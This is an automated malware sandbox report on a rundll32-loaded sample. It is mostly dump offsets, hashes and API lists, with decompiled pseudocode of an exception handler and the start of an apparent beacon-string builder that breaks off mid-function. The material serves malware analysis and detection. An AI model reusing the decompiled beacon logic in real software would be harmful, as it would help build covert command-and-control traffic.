Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: e317b941dc8dfe9ec39a222fc702989a8da11a25c9efd74ea1d3980d5bd6a09e
Instruction ID: 6fa67f10781552f46fbf2656e5b3297ae00f6ba6dba3253ab70069ae3c80ab1d
Opcode Fuzzy Hash: e317b941dc8dfe9ec39a222fc702989a8da11a25c9efd74ea1d3980d5bd6a09e
Instruction Fuzzy Hash: 8161D430612632DFDF29CF29E88072D33A5EB45754B248429D962C7EA5EF31DE4F8650

Uniqueness

Uniqueness Score: -1.00%

Function 7034AC85, Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9afac394e5d233d02bb37012621e5fcaf35f94694c5f0d31a29d259aca6ee3d6
Instruction ID: 5b7dda530c05d000474f243aa3979347d8e0e799cfb647b152ac3d3d18f4ea9f
Opcode Fuzzy Hash: 9afac394e5d233d02bb37012621e5fcaf35f94694c5f0d31a29d259aca6ee3d6
Instruction Fuzzy Hash: BA41AEB5C04618AFDB10DF69CC89ABEBBF9AB45200F1452DDF41EDB210EA359E858F50

Uniqueness

Uniqueness Score: -1.00%

Function 7034E0ED, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 70344589: GetLastError.KERNEL32(?,?,?,70340192), ref: 7034458E
Part of subcall function 70344589: SetLastError.KERNEL32(00000000,7038C130,000000FF,?,?,?,70340192), ref: 7034462C

Part of subcall function 70344589: _free.LIBCMT ref: 703445EB
Part of subcall function 70344589: _free.LIBCMT ref: 70344621

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7034E141

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: f1ea03a840b1bfd776c13c163168d30b879c923b203b9e0d0c8e1c4f4ec5eaf9
Instruction ID: 4b9204a4e41d4cd0314a5514ed7f434218e4ad19cc87afdbe127b6119625a4b9
Opcode Fuzzy Hash: f1ea03a840b1bfd776c13c163168d30b879c923b203b9e0d0c8e1c4f4ec5eaf9
Instruction Fuzzy Hash: 5521B376650206AFEB198A65CC42ABE77ECEF04718F10527EF902CE240EB74ED41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 7034DD86, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(7034DE9A,00000001,00000000,?,-00000050,?,7034E4C8,00000000,?,?,?,00000055,?), ref: 7034DDE4

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 1bad84c76a158934e1693c6c001308651a372044945a2be7bccc58802a50ccc8
Instruction ID: 29daf0d6ca87c7455ffa55644d6e70a9fe5ebfbb035215850e0d08bd55ddb271
Opcode Fuzzy Hash: 1bad84c76a158934e1693c6c001308651a372044945a2be7bccc58802a50ccc8
Instruction Fuzzy Hash: 3301923A6007018FDB08AF38C4A02BEB7E2FF84319755892DE9878BA40D371B583CB40

Uniqueness

Uniqueness Score: -1.00%

Function 7034DE9A, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 70344589: GetLastError.KERNEL32(?,?,?,70340192), ref: 7034458E
Part of subcall function 70344589: SetLastError.KERNEL32(00000000,7038C130,000000FF,?,?,?,70340192), ref: 7034462C

Part of subcall function 70344589: _free.LIBCMT ref: 703445EB
Part of subcall function 70344589: _free.LIBCMT ref: 70344621

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7034DEEE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7034DFFE

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: ErrorInfoLastLocale_free
String ID:
API String ID: 2665345825-0
Opcode ID: 887373e6562bb470d8683f8438049e6336793353fab7d10f59c4ba852b4e4ff0
Instruction ID: 5211326208f6990d1e4b428c15bac8741862b17420034f352f074c8d56b42ba7
Opcode Fuzzy Hash: 887373e6562bb470d8683f8438049e6336793353fab7d10f59c4ba852b4e4ff0
Instruction Fuzzy Hash: 9601B53295021A9FEB149B68CC46FBA33ECDF04310F1151B5BA05DF280EB78ED458750

Uniqueness

Uniqueness Score: -1.00%

Function 7034E319, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 70344589: GetLastError.KERNEL32(?,?,?,70340192), ref: 7034458E
Part of subcall function 70344589: SetLastError.KERNEL32(00000000,7038C130,000000FF,?,?,?,70340192), ref: 7034462C

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,7034E0B6,00000000,00000000,?), ref: 7034E345

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: eda2272dea4b6ae242e2bceff1028c7e7cb50991d119ff59ecee6d84ec3721a4
Instruction ID: 6331fba95530e0f890c53abaf26187d2a1ed42c08fb72ac78c3feb581d96c812
Opcode Fuzzy Hash: eda2272dea4b6ae242e2bceff1028c7e7cb50991d119ff59ecee6d84ec3721a4
Instruction Fuzzy Hash: A5F0F93AA00115AFDB154F61CC05BBE77E8EB40658F115668FC03AB140DA74FD41C690

Uniqueness

Uniqueness Score: -1.00%

Function 7034DE0D, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 70344589: GetLastError.KERNEL32(?,?,?,70340192), ref: 7034458E
Part of subcall function 70344589: SetLastError.KERNEL32(00000000,7038C130,000000FF,?,?,?,70340192), ref: 7034462C

EnumSystemLocalesW.KERNEL32(7034E0ED,00000001,?,?,-00000050,?,7034E48C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 7034DE57

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: e65f70936d003f9224cdc669c7b73e838ccded9f055ea109972c55c27fc16f69
Instruction ID: 7aed87562274d9c4efc02fc76d170ead9eef3030c1eecabb183fcdf1b096e41e
Opcode Fuzzy Hash: e65f70936d003f9224cdc669c7b73e838ccded9f055ea109972c55c27fc16f69
Instruction Fuzzy Hash: CBF0C2362003045FDB155F3A9881A7E7BE5EB81768F15842DF9464F650C6B1AC82C650

Uniqueness

Uniqueness Score: -1.00%

Function 703447E8, Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 7034155B: RtlEnterCriticalSection.NTDLL(-7038D4B0), ref: 7034156A

EnumSystemLocalesW.KERNEL32(703447DB,00000001), ref: 70344820

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: a7314dbfa49ebc63b2a1ba04b5bb835c2e969ef165d9eeabc2e62ab69faede4f
Instruction ID: 645fc6d25e88f62a9f9f4b54dd30eee78e9b278310f17af205a89896c77c9cce
Opcode Fuzzy Hash: a7314dbfa49ebc63b2a1ba04b5bb835c2e969ef165d9eeabc2e62ab69faede4f
Instruction Fuzzy Hash: 18F0F972A10304DFEB00DFA9D881BADB7F0EB49731F20416AF415EF2A0DB75A9418B94

Uniqueness

Uniqueness Score: -1.00%

Function 7034DD27, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 70344589: GetLastError.KERNEL32(?,?,?,70340192), ref: 7034458E
Part of subcall function 70344589: SetLastError.KERNEL32(00000000,7038C130,000000FF,?,?,?,70340192), ref: 7034462C

EnumSystemLocalesW.KERNEL32(7034DC80,00000001,?,?,?,7034E4EA,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 7034DD5E

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: ef9c389a289ae0ea2930d8d8a412f016892abdaf398eee7064074bab8147120a
Instruction ID: b90bde60097cae2444aeb56389e9ae440b6bef3c69b5badf215f4ab2da86bb74
Opcode Fuzzy Hash: ef9c389a289ae0ea2930d8d8a412f016892abdaf398eee7064074bab8147120a
Instruction Fuzzy Hash: ADF0E53670020557DB05AF36D845B7E7FE5EFC2610F074069FA068F650C671E882C790

Uniqueness

Uniqueness Score: -1.00%

Function 70344CAD, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,00000000,00000002,?,?,?,70347A78,?,00001004,?,00000002,00000000,?,00000000), ref: 70344CE1

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: fc51e7d8805f8162a5a6e388133e4fe16746daf6f2fa3bd088b988d8d9eeeb4b
Instruction ID: c22338fca8869b4a3b0b89f9886f5711fe317d3f7d694ff280e40b28a869d3c8
Opcode Fuzzy Hash: fc51e7d8805f8162a5a6e388133e4fe16746daf6f2fa3bd088b988d8d9eeeb4b
Instruction Fuzzy Hash: B0E04F32501219BBEF132F61DC05ABE7FA9FF44750F14A034FD456A120CBB29D61AAE0

Uniqueness

Uniqueness Score: -1.00%

Function 703483FA, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 703483FA

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: a8fd9b0b37c0b6588076195b7d514d3b629d0a2d652770780b8857b8b473e747
Instruction ID: ec777d8cdb857256c12aded87c6a63dc30cd9d090190152fed935b1abf635f45
Opcode Fuzzy Hash: a8fd9b0b37c0b6588076195b7d514d3b629d0a2d652770780b8857b8b473e747
Instruction Fuzzy Hash: 12A02431100100CF53004F334DC470C37DD77401D03351054D001C0470D73C40C07700

Uniqueness

Uniqueness Score: -1.00%

Function 70354362, Relevance: .4, Instructions: 379COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 003e67a69479c5c7b4d563b3ec7c73bc4832d06946a6b895562ad24d4d38c810
Instruction ID: 20cb811d03b104a4f0636cda77571ac1719ca1a91bb5033e51e0cce64ccb7699
Opcode Fuzzy Hash: 003e67a69479c5c7b4d563b3ec7c73bc4832d06946a6b895562ad24d4d38c810
Instruction Fuzzy Hash: 90B1D530608F488FDB5ADF38985862977F1FB99304B01466ED88BC7666DF74D846C782

Uniqueness

Uniqueness Score: -1.00%

Function 7034D536, Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 4283097504-0
Opcode ID: a9ea3ab7084900e43a097f09285bc025f1ff11795bc91ba3f421ca0e8b07b36f
Instruction ID: fadae7e26d6ef70b4bc880918892a88533672a8cf48fd8d8feb1a50c21ddc600
Opcode Fuzzy Hash: a9ea3ab7084900e43a097f09285bc025f1ff11795bc91ba3f421ca0e8b07b36f
Instruction Fuzzy Hash: 00B102356007058FD7299F24C882ABFB7F9EF41308F55546DF9478E684EAB5B982CB10

Uniqueness

Uniqueness Score: -1.00%

Function 7033F000, Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 852f927ebc5390c0fceb6239aaaa07299def320f66d3333cbb912f6c767ac1f7
Instruction ID: 768398f06eddcb04880e8ef5608a72f88c6a5edafd3dabb41793fea2c2055f47
Opcode Fuzzy Hash: 852f927ebc5390c0fceb6239aaaa07299def320f66d3333cbb912f6c767ac1f7
Instruction Fuzzy Hash: 9351B1362050934EEF0E463AC5B403EFAB15E926B5B9B076DD8B3CB1C9FE20C524D620

Uniqueness

Uniqueness Score: -1.00%

Function 70332274, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E70332274(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E703323DB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E70332495(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E70332380(_t55, _t66);
										_t89 = _t66 + 0x10;
										E703323DB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E70332477(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x70332278
0x70332279
0x7033227a
0x7033227d
0x7033227f
0x70332282
0x70332283
0x70332285
0x70332286
0x70332287
0x7033228a
0x70332294
0x70332345
0x7033234c
0x70332355
0x7033229a
0x7033229a
0x703322a0
0x703322a6
0x703322a9
0x703322ac
0x703322b0
0x703322b5
0x703322ba
0x7033233a
0x00000000
0x703322bc
0x703322bc
0x703322c8
0x703322ca
0x70332325
0x70332325
0x7033232b
0x00000000
0x703322cc
0x703322db
0x703322dd
0x703322de
0x703322df
0x703322e2
0x703322e2
0x703322e4
0x00000000
0x703322e6
0x703322e6
0x70332330
0x703322e8
0x703322e8
0x703322ec
0x703322f4
0x703322f9
0x703322fe
0x7033230a
0x70332312
0x70332319
0x7033231f
0x70332323
0x00000000
0x70332323
0x703322e6
0x703322e4
0x00000000
0x703322ca
0x7033233e
0x7033233e
0x7033233e
0x703322ba
0x7033235a
0x70332361

Memory Dump Source

Source File: 00000017.00000002.735843702.0000000070331000.00000020.00020000.sdmp, Offset: 70330000, based on PE: true

Associated: 00000017.00000002.735830100.0000000070330000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735858122.0000000070333000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735877674.0000000070335000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.735897152.0000000070336000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_70330000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: ad22b86f31a817f40646a0aaab00795678d7cf60022e9e0a033aaf9602db0fbf
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 832192769002049FC700DF69C8C0CABF7A5BF48360F868168E9569B245DB34FA15CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00C27E30, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E00C27E30(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00C27F9B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00C28055(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00C27F40(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00C27F9B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00C28037(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x00c27e34
0x00c27e35
0x00c27e36
0x00c27e39
0x00c27e3b
0x00c27e3e
0x00c27e3f
0x00c27e41
0x00c27e42
0x00c27e43
0x00c27e46
0x00c27e50
0x00c27f01
0x00c27f08
0x00c27f11
0x00c27e56
0x00c27e56
0x00c27e5c
0x00c27e62
0x00c27e65
0x00c27e68
0x00c27e6c
0x00c27e71
0x00c27e76
0x00c27ef6
0x00000000
0x00c27e78
0x00c27e78
0x00c27e84
0x00c27e86
0x00c27ee1
0x00c27ee1
0x00c27ee7
0x00000000
0x00c27e88
0x00c27e97
0x00c27e99
0x00c27e9a
0x00c27e9b
0x00c27e9e
0x00c27e9e
0x00c27ea0
0x00000000
0x00c27ea2
0x00c27ea2
0x00c27eec
0x00c27ea4
0x00c27ea4
0x00c27ea8
0x00c27eb0
0x00c27eb5
0x00c27eba
0x00c27ec6
0x00c27ece
0x00c27ed5
0x00c27edb
0x00c27edf
0x00000000
0x00c27edf
0x00c27ea2
0x00c27ea0
0x00000000
0x00c27e86
0x00c27efa
0x00c27efa
0x00c27efa
0x00c27e76
0x00c27f16
0x00c27f1d

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: 7c239452f43f49b0eedf438664a063fefc843df0c7bb2d7e0ae7055a0a4362ca
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: D321C8329052149FCB14EF68D8C19ABB7A5FF44360B0685A8ED158B645DB30FE15C7F0

Uniqueness

Uniqueness Score: -1.00%

Function 7033F500, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 76385f0c4f1d9c3b8ceb137b28ff1c3f3b98ee7761cf744cc46a42790e93f7fb
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 8211B6772010828BFE058D2ED4F46BFE7B9EBCB221FEA436ED0574B658D222E9559500

Uniqueness

Uniqueness Score: -1.00%

Function 7038EBE6, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.736035650.000000007038E000.00000040.00020000.sdmp, Offset: 7038E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7038e000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 1c763c6bdc2243b534521db2337926722e3716e164414c999cabed7545aed9e0
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: 961193737401049FD714CE59DC81E9673EAFB88234B2581AAED05CB345E639EC51C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 7038EFDF, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.736035650.000000007038E000.00000040.00020000.sdmp, Offset: 7038E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7038e000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
Instruction ID: e2a6a5afe3bf320d1586e9ecaf4533ed9e2c6cb461846c1eb131b4b4061ec635
Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
Instruction Fuzzy Hash: FF01C0B23142008FC706CF28D98496EB7E8EBE5325B26C0BEC54783657E234E845CA31

Uniqueness

Uniqueness Score: -1.00%

Function 7034A97E, Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81c9ab67e0caf7e2710a5d2216f630ee284cb2a8ad29f3645095a05429589852
Instruction ID: 5a9ada20b551ab2742cb5a641486edf87e1bcbe8266c5bfe304d6ca417884706
Opcode Fuzzy Hash: 81c9ab67e0caf7e2710a5d2216f630ee284cb2a8ad29f3645095a05429589852
Instruction Fuzzy Hash: 21E08C72A11268EBCB10CB88C90499EB3FCEB44A10B1240AAF512DB100C2B0EE01C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 00C2254C, Relevance: 33.3, APIs: 22, Instructions: 262
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00C2254C(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t107;
				intOrPtr _t111;
				signed int _t115;
				char** _t117;
				int _t120;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t135;
				int _t138;
				intOrPtr _t139;
				int _t142;
				void* _t143;
				void* _t144;
				void* _t154;
				int _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t154 = __edx;
				_t144 = __ecx;
				_t63 = __eax;
				_t143 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0xc2a018; // 0xe0c3a72a
				asm("bswap eax");
				_t65 =  *0xc2a014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0xc2a010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0xc2a00c; // 0x8e03bf7
				asm("bswap eax");
				_t68 =  *0xc2a2d4; // 0x449d5a8
				_t3 = _t68 + 0xc2b622; // 0x74666f73
				_t157 = wsprintfA(_t143, _t3, 3, 0x3d163, _t67, _t66, _t65, _t64,  *0xc2a02c,  *0xc2a004, _t63);
				_t71 = E00C26A9F();
				_t72 =  *0xc2a2d4; // 0x449d5a8
				_t4 = _t72 + 0xc2b662; // 0x74707526
				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t75;
				if(_a8 != 0) {
					_t139 =  *0xc2a2d4; // 0x449d5a8
					_t8 = _t139 + 0xc2b66d; // 0x732526
					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t142;
				}
				_t76 = E00C22C60(_t144);
				_t77 =  *0xc2a2d4; // 0x449d5a8
				_t10 = _t77 + 0xc2b38a; // 0x6d697426
				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
				_t81 =  *0xc2a2d4; // 0x449d5a8
				_t12 = _t81 + 0xc2b7b4; // 0x50c8d5c
				_t180 = _a4 - _t12;
